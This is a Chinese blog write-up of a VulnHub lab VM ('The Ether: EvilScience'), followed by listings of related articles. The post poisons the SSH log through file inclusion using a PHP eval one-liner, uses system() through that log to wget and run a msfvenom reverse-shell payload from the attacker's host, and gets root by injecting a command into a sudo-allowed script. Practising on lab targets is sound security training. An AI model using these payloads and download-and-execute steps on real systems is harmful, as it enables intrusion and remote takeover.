The Ether: EvilScience VM靶机打靶记录

于 2024-10-09 14:15:05 发布
阅读量788 收藏 9
点赞数 17
分类专栏: vulnhub靶场 The Ether靶机 文章标签: 打靶记录 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64703089/article/details/142785596
版权

一、靶机介绍

下载地址:https://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip

二、信息收集

扫描一下目标靶机的ip:192.168.242.135

arp-scan -l

扫描端口

nmap -p- -A 192.168.242.135

这里看开放了 22,80端口

扫描一下目录

apt-get update
apt-get install dirsearch
dirsearch -u http://192.168.242.135

探测出 /about.php /images

先尝试访问80端口看看有什么功能点

发现在 ABOUT US RESEARCH 这俩个地方,看看url都是被包含的文件,看看有没有文件包含漏洞

想想开放了22ssh端口,结合文件包含,可以进行向本地ssh日志中写shell,然后本地文件包含ssh的日志文件即可getshell

三、Getshell

因为扫描端口是发现是 apache 搭建的,默认ssh登陆日志为 /var/log/auth.log

先尝试把正常的登陆信息写入日志

ssh root@192.168.242.135

然后直接在url中包含这个日志文件发现没什么变化

尝试用bp抓包包含这个日志

最后在响应包里发现了登陆信息的日志

那就尝试构造含有一句话木马的登陆信息

ssh '<?php @eval($_GET[d1no]);?>'@192.168.242.135

这里用2024版的kali会报这样的错误说用户名非法

用2023年的试试

使用msf,先生成一个木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 -f elf > shell.elf

在木马位置起一个http服务用来上传到目标主机

python -m http.server 8001

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.242.128
set lport 4444
run

做好这些这些准备之后

木马有了,现在就是上传到目标靶机,然后执行在msf上线即可

我们可以利用system()函数执行系统命令,去下载msf生成的木马

这里我们在bp上操作

/?file=/var/log/auth.log&d1no=system('wget+192.168.242.128:8001/shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

反弹成功

我们转成交互式的会话

shell
python -c 'import pty;pty.spawn("/bin/bash")'

Getshell成功

四、权限提升

sudo -l 先看看哪些程序可以执行root权限先看看哪些程序可以执行root权限

发现可以使用sudo权限不需要密码执行xxxlogauditorxxx.py

尝试运行一下

sudo ./xxxlogauditorxxx.py

最后发现输入 /var/log/auth.log | whoami 这样可以在后面执行命令

提权成功!!!!

安全beginner
关注
专栏目录
Vulnhub靶机:The Ether: EvilScience
whoami
09-25 1019
Vulnhub靶机:The Ether: EvilScience实战
The Ether: Evil Science靶机
zdd1453691081的博客
08-05 292
【代码】The Ether: Evil Science靶机
Vulhub TheEther_1.0.1靶机详解
weixin_62457642的博客
09-26 384
靶机TheEther_1.0.1速刷
The Ether: Evil Science靶机渗透测试
weixin_58786230的博客
08-08 406
【代码】The Ether: Evil Science靶机渗透测试。
vulnhub靶机渗透 theEther
RestoreJustice的博客
03-19 255
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。192.168.110.131,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24。官方提供了一个提示:靶机中有一个相关的文件,在渗透过程中发挥重要作用,但是不要浪费时间试图去解密这个混淆后的文件。获取webshell。之后利用前面获得的一句话,执行命令,下载生成的木马,并且运行。
The Ether: EvilScience靶机渗透实战总结
weixin_34220834的博客
08-20 1244
近期朋友给我发了一个靶机,说是他在日志注入的时候遇到了一点小问题,让我帮忙解决一下。下载下来之后,感觉这个靶机还是挺不错的,里边有一些套路,于是整理成一篇文章,感兴趣的小伙伴可以自己尝试一下。 靶机下载https://www.vulnhub.com/entry... 信息收集首先扫描内网,发现目标主机ip arp-scan -l ...
ether:使用ssh的在线商店
05-18
醚 使用ssh的在线商店
ether:Unity软件包,用于可调制并具有各种效果的信号变量
02-21
Ether是专为Unity游戏引擎设计的一个软件包,它专注于提供可调制且具有各种效果的信号变量。在Unity中,信号变量(或事件系统)通常用于实现组件间的通信,允许不同部分的游戏逻辑相互触发和响应特定事件。这个...
Hi-Ether:基于计时器的Discord Webhook,将倒计时数天,直到产品发布
05-11
【Hi-Ether:基于计时器的Discord Webhook】是一种创新的技术解决方案,它结合了JavaScript编程语言和Discord的Webhook功能,用于在产品发布前进行倒计时通知。这个系统的核心是利用计时器机制,实时更新并显示距离...
capture the ether靶场题解(Lotteries)
m0_68764244的博客
10-25 1207
这题同样要求我们猜answer,但他的answer是在每次Guess的时候生成的,无法通过web3进行查询,但我们明白一件事,合约之间的调用是在同一个区块当中的,也就是说,如果我们通过攻击合约进行调用guess,那么我们攻击合约生成的answer与guess生成的answer是相同的。这关他的answer是随机生成的,根据创建时候的区块数量进行生成,并且由于没有进行修饰符修饰,默认为internal变量,所以我们无法直接看到,但任何数据在区块链上都是无法隐藏的,我们通过web3库就能直接拿到该值。
capture the ether靶场题解(Math)
m0_68764244的博客
11-21 1903
if代码块本身的逻辑是没有问题的,并不会出现变量覆盖的情况,但else就不一样了,由于没有进if,相当于直接创建了一个结构体变量,这势必会造成变量覆盖,而能够覆盖的就是数组的长度以及head。由于数组的长度取决于我们传入的wei数,而在push中会对数组的length++,length又跟amount公用一个slot,所以我们传入1wei则长度和amount都2,我们两次都传入1wei,则第一次push的结构体会被第二次push的结构体覆盖,具体原因我就不一一阐释了。
靶机渗透(十二)evilscience
qq_42180996的博客
05-23 1854
靶机evilscience 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.目录扫描(dirb) 3.文件包含漏洞利用 >另一种执行ls命令的方法 4...
Vulnhub靶场渗透-theEther
paidx0
10-03 1315
前言 这次的靶机还是很好玩的,有点难度折腾了挺久,但方法对了那就很容易了 靶机ip(192.168.110.129) 攻击机ip(192.168.110.127) 网络NAT模式 不废话了直接开始 信息收集 打开网页简单看了看,没有过多的内容,是个基因的论文网站 网站没有太多的功能,而且扫目录也没扫到什么有价值的东西 最开始以为网站上的这些单词可能会用到,就利用他们做了个字典去爆破 ssh,显然我的方法就是错的 漏洞挖掘 注意到这个位置很有可能是利用存在读文件,简单尝试了几次Apache的日志文件
kali渗透综合靶机(十六)--evilscience靶机
W小哥
04-02 1100
https://download.vulnhub.com/theether/theEther_1.0.1.zip
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
LYJ20010728的博客
08-07 1332
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE环境下载THE ETHER: EVILSCIENCE靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 THE ETHER: EVILSCIENCE靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 攻击机IP地址:192.168.246.129 渗透测试 信息搜集 用netdiscover查看一下:sudo netdiscover -r 192.168.246.0
靶机记录(十二):evilscience
weixin_47306547的博客
10-30 543
目录 主机发现 端口扫描 SSH尝试连接 Web渗透 漏洞挖掘 GetShell 法一 法二(MSF) 提权 法一(失败了) 法二(脏牛,也失败了。。)​​​ 法三 法四 法五 flag 清痕迹,留后门 主机发现 端口扫描 SSH尝试连接 Web渗透 漏洞挖掘 试试其他的路径 : /var/log/apache2/access.log /var/log/apache/access.log -----WE...
com.harmonyos.exception.VpnConnectionException.md
11-11
鸿蒙开发中碰到的报错,问题已解决,写个文档记录一下这个问题及解决方案
PDF编辑器+OCR图文转文本,好用,强烈推荐
最新发布
11-11
PDF编辑器+OCR图文转文本,好用,强烈推荐
Protocols in frame: eth:ethertype:ip:icmp:data
05-24
这是一个网络数据包的协议栈,其中包含了以下协议: - Ethernet (eth):数据链路层协议,用于在本地网络中传输数据帧。 - Ethertype:以太网类型,用于标识上层协议类型,例如IP、ARP等。 - IP:网络层协议,用于在网络中传输数据包。 - ICMP:Internet控制报文协议,用于在IP网络中传递控制消息。 - Data:应用层数据,例如HTTP请求或DNS查询等。 在这个协议栈中,数据从应用层开始,逐层封装,最终被发送到物理层进行传输。当数据到达接收端时,它会被一层一层地解封,直到应用层可以读取数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值